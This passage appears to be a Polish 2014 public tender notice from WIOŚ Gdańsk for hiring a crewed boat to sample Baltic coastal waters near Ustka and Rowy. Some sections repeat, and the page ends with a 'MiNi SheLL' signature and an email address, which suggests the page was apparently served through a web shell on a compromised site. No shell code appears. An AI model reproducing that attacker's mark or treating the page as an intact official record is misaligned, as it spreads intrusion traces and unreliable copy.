c) system nawigacji GPS umożliwiający dokładne określenie współrzędnych geograficznych punktu poboru prób, 
d) możliwość utrzymania pozycji w punkcie poboru prób przez około godzinę (kotwica o odpowiedniej masie i długości liny), 

1.5. Do najważniejszych obowiązków Wykonawcy należeć będzie: 

a) przydzielenie, co najmniej jednej osoby z załogi do pomocy pracownikowi Zamawiającego przy poborze próbek i wykonywaniu badań na pokładzie, polegającej w szczególności na:
- załadunku i wyładunku sprzętu i wyposażenia badawczego na samochód oraz statek/łódź hybrydową,
- obsłudze żurawika z ręczną wyciągarką wykorzystywanego do pracy z  pobornikami próbek wody (statek),
- obsłudze zwijadła kabloliny sondy wieloparametrowej (statek),
- operowaniu pobornikiem dna przy użyciu żurawia pokładowego (statek/łódź hybrydow), 
- przemywaniu osadów dennych (statek/łódź hybrydowa),
- przenoszeniu, pakowaniu oraz innych czynnościach manualnych przy pobieraniu próbek na pokładzie statku/łodzi hybrydowej, 
b) przewóz urządzeń i sprzętu, samochodem Wykonawcy, z siedziby WIOŚ na jednostkę pływającą (statek/łódź hybrydową), rano w dniu rejsu lub wieczorem dnia poprzedniego, oraz transport pobranych próbek, urządzeń, sprzętu,  i pracownika(ów) Zamawiającego po rejsie, do siedziby WIOŚ w Gdańsku, Trakt Św. Wojciecha 293, 
c) dowóz próbek do siedziby Zamawiającego, maksymalnie w ciągu 24 godzin, od czasu ich poboru, 
d) dowóz pracownika Zamawiającego w dniu rejsu z miejsca jego zamieszkania (15 km od siedziby WIOŚ) na statek/łódź hybrydową i transport powrotny do miejsca jego zamieszkania, w przypadku gdy pobór próbek trwa dłużej niż osiem godzin, 
e) telefoniczne powiadamianie Zamawiającego, z co najmniej 12 godzinnym wyprzedzeniem, o braku możliwości realizacji planowanego rejsu ze względu na niesprzyjające warunki pogodowe lub inne przyczyny losowe,
f) zapewnienie zastępstwa w zakresie jednostki pływającej, osoby do pomocy przy poborze próbek oraz samochodu do przewozu pracowników Zamawiającego, próbek, urządzeń i sprzętu, które umożliwi realizację przedmiotu zamówienia wymienionego w pkt. 1.1. i 1.2., zgodnie z zaplanowanym harmonogramem, w przypadku zaistnienia czynników losowych - choroba Wykonawcy, awaria samochodu lub jednostki, itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.60.00.00-0, 60.65.11.00-7, 90.73.31.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wynajem jednostki pływającej wraz z załogą w celu prowadzenia monitoringu morskich wód przejściowych i przybrzeżnych Bałtyku - w rejonie  Ustki i Rowów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający planuje zrealizowanie w roku 2014, w okresie od 17.03.2014r. do 30.11.2014r.,  sześciu cykli pomiarowych (rejsów) i pobór próbek z 3 punktów pomiarowo kontrolnych. W zależności od warunków pogodowych ilość dni rejsowych może ulec zmianie. Wykaz i lokalizację punktów pomiarowo kontrolnych na wodach przybrzeżnych Bałtyku a także harmonogram i częstotliwość rejsów realizowanych przez Delegaturę WIOŚ w Słupsku określa załącznik nr 4 do SIWZ (tab. 4 i tab. 5 oraz ryc.3). Z uwagi na lokalizacje punktów monitoringowych wchodzących w skład części II przedmiotu zamówienia wskazane jest, aby jednostka pływająca stacjonowała w porcie w Ustce.
W każdym miesiącu, w którym zaplanowano badania monitoringowe, w ramach jednego rejsu przeprowadzony zostanie pobór próbek na trzech punktach pomiarowo kontrolnych. 
Zamawiający posiada wszystkie niezbędne urządzenia do poboru próbek i badań wykonywanych z jednostki pływającej (czerpacze wody, dna, sita, pojemniki na próbki itp.). Zamawiający w celu realizacji przedmiotu zamówienia właściwego dla części II, dysponuje własnym środkiem transportu. Przewiduje się uczestnictwo, w wykonywaniu zadań wynikających z zakresu monitoringu, przez maksymalnie dwóch pracowników Zamawiającego. Rejsy zaczynać i kończyć się będą w porcie w Ustce.
 

1.3. Wymogi dla jednostki pływającej (jachtu motorowego) i załogi

1.3.1.  Jednostka pływająca realizująca przedmiot zamówienia (rejsy) musi:  
a) posiadać ważną kartę bezpieczeństwa umożliwiającą żeglugę całodobową określającą między innymi rejon pływania, minimalny skład załogi oraz wymagane kwalifikacje załogi,
b) spełniać wymagania techniczne oraz posiadać wyposażenie, w tym środki ratunkowe, wynikające z obowiązujących przepisów, właściwe dla żeglugi po wodach morskich, 
c) zezwolenie na obecność na jednostce pływającej łącznej liczby pasażerów i załogi (w żegludze minimum przybrzeżnej) nie mniejszej niż 4 osoby,
d) załoga (min. 2 osoby) musi posiadać odpowiednie uprawnienia pozwalające na prowadzenie i obsługę jednostki, 
e) być wyposażona w indywidualne środki ratunkowe dla pracowników Zamawiającego przebywających na pokładzie w czasie poboru prób (maksymalnie 2 osób), wynikające z przepisów dotyczących pracy na morzu.

1.3.2. Minimalne parametry techniczne wymagane dla jednostki pływającej (jachtu motorowego) 

a) silnik umożliwiający prędkość podróżną - min. 10 węzłów,
b) zanurzenie umożliwiające pobór próbek w punktach pomiarowo kontrolnych o głębokościach w zakresie od 1,5m do 40 m, 
c) pokład wyposażony w żuraw/dźwig o nośności ok. 0,5 tony oraz kabestan/wyciągarkę elektryczną o udźwigu ok. 100 kg, które umożliwiają zainstalowanie urządzenia do poboru prób osadów dennych o wadze ok. 50kg, 
d) możliwość zamocowania na burcie/relingu ręcznej wyciągarki do poboru próbek wody, 
e) system nawigacji GPS umożliwiający dokładne określenie współrzędnych geograficznych punktu poboru prób, 
f) możliwość utrzymania pozycji w punkcie poboru prób przez około godzinę (kotwica o odpowiedniej masie i długości liny), 
g) pompa wody zaburtowej z możliwością regulacji strumienia podawanej wody, 
h) zaplecze socjalno-sanitarne w postaci: toalety, miejsca przygotowywania i spożywania posiłków zapewniającego podgrzanie posiłku i zagotowanie wody, miejsca do odpoczynku.
 
1.4.  Wymogi dla jednostki pływającej (łodzi hybrydowej) i załogi

1.4.1. Jednostka pływająca realizująca przedmiot zamówienia (rejsy) musi:
  
a) posiadać ważną kartę bezpieczeństwa określającą m.in. minimalny skład załogi oraz wymagane kwalifikacje załogi,
b) spełniać wymagania techniczne oraz posiadać wyposażenie, w tym środki ratunkowe, wynikające z obowiązujących przepisów, właściwe dla żeglugi po wodach morskich, 
c) zezwolenie na obecność na jednostce pływającej łącznej liczby pasażerów i załogi nie mniejszej niż 3 osoby,
d) załoga musi posiadać odpowiednie uprawnienia pozwalające na prowadzenie i obsługę jednostki, 
e) być wyposażona w indywidualne środki ratunkowe dla pracowników Zamawiającego przebywających na pokładzie łodzi w czasie poboru prób (maksymalnie 2 osób), wynikające z przepisów dotyczących pracy na morzu.

1.4.2. Minimalne parametry techniczne wymagane dla jednostki pływającej (łodzi) 

a) silnik umożliwiający prędkość podróżną - min. 10 węzłów,
b) zanurzenie umożliwiające pobór próbek w płytkowodnych punktach pomiarowo kontrolnych o głębokościach ok. 1,5m, 
c) system nawigacji GPS umożliwiający dokładne określenie współrzędnych geograficznych punktu poboru prób, 
d) możliwość utrzymania pozycji w punkcie poboru prób przez około godzinę (kotwica o odpowiedniej masie i długości liny), 

1.5. Do najważniejszych obowiązków Wykonawcy należeć będzie: 

a) przydzielenie, co najmniej jednej osoby z załogi do pomocy pracownikowi Zamawiającego przy poborze próbek i wykonywaniu badań na pokładzie, polegającej w szczególności na:
- załadunku i wyładunku sprzętu i wyposażenia badawczego na samochód oraz statek/łódź hybrydową,
- obsłudze żurawika z ręczną wyciągarką wykorzystywanego do pracy z  pobornikami próbek wody (statek),
- obsłudze zwijadła kabloliny sondy wieloparametrowej (statek),
- operowaniu pobornikiem dna przy użyciu żurawia pokładowego (statek/łódź hybrydow), 
- przemywaniu osadów dennych (statek/łódź hybrydowa),
- przenoszeniu, pakowaniu oraz innych czynnościach manualnych przy pobieraniu próbek na pokładzie statku/łodzi hybrydowej, 
b) przewóz urządzeń i sprzętu, samochodem Wykonawcy, z siedziby WIOŚ na jednostkę pływającą (statek/łódź hybrydową), rano w dniu rejsu lub wieczorem dnia poprzedniego, oraz transport pobranych próbek, urządzeń, sprzętu,  i pracownika(ów) Zamawiającego po rejsie, do siedziby WIOŚ w Gdańsku, Trakt Św. Wojciecha 293, 
c) dowóz próbek do siedziby Zamawiającego, maksymalnie w ciągu 24 godzin, od czasu ich poboru, 
d) dowóz pracownika Zamawiającego w dniu rejsu z miejsca jego zamieszkania (15 km od siedziby WIOŚ) na statek/łódź hybrydową i transport powrotny do miejsca jego zamieszkania, w przypadku gdy pobór próbek trwa dłużej niż osiem godzin, 
e) telefoniczne powiadamianie Zamawiającego, z co najmniej 12 godzinnym wyprzedzeniem, o braku możliwości realizacji planowanego rejsu ze względu na niesprzyjające warunki pogodowe lub inne przyczyny losowe,
f) zapewnienie zastępstwa w zakresie jednostki pływającej, osoby do pomocy przy poborze próbek oraz samochodu do przewozu pracowników Zamawiającego, próbek, urządzeń i sprzętu, które umożliwi realizację przedmiotu zamówienia wymienionego w pkt. 1.1. i 1.2., zgodnie z zaplanowanym harmonogramem, w przypadku zaistnienia czynników losowych - choroba Wykonawcy, awaria samochodu lub jednostki, itp.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.60.00.00-0, 60.65.11.00-7, 90.73.31.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com